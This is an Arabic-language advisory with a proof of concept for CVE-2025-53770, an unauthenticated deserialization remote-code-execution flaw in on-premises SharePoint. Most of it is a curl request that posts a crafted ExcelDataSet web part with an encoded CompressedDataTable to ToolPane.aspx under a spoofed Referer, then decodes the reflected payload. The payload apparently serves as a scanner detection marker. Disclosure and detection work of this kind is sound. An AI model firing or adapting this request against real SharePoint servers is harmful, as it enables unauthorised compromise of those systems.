
إثبات المفهوم لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بعد غير المصادق عليها عبر إلغاء التسلسل غير الآمن في خادم Microsoft SharePoint (CVE-2025-53770)، مع أوامر استخراج الحمولة وفك التشفير.
حرج — تنفيذ أوامر عن بُعد بدون مصادقة عبر إلغاء تسلسل غير آمن في خادم Microsoft SharePoint (CVE-2025-53770)
يسمح إلغاء تسلسل البيانات غير الموثوقة في خادم Microsoft SharePoint المحلي للمهاجم بتنفيذ الأكواد عن بُعد واختراق النظام. تدرك Microsoft وجود استغلال نشط وتستعد لتحديث شامل. تأكد من تطبيق التخفيفات الموثقة في مستندات CVE.
يوضح إثبات المفهوم التالي كيف يمكن للمهاجم استغلال الثغرة لاستخراج وفك تشفير الحمولات الخبيثة عبر نقطة النهاية الضعيفة.
تم استبدال النطاق المستهدف عمداً بـ reeaccated.com.
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
<Info>IntruderScannerDetectionPayload</Info>
التأثير:
يمكن للمهاجمين غير المصادقين استغلال إلغاء التسلسل غير الآمن لتحقيق تنفيذ الأوامر عن بُعد على خادم SharePoint، مما يؤدي إلى اختراق كامل للنظام.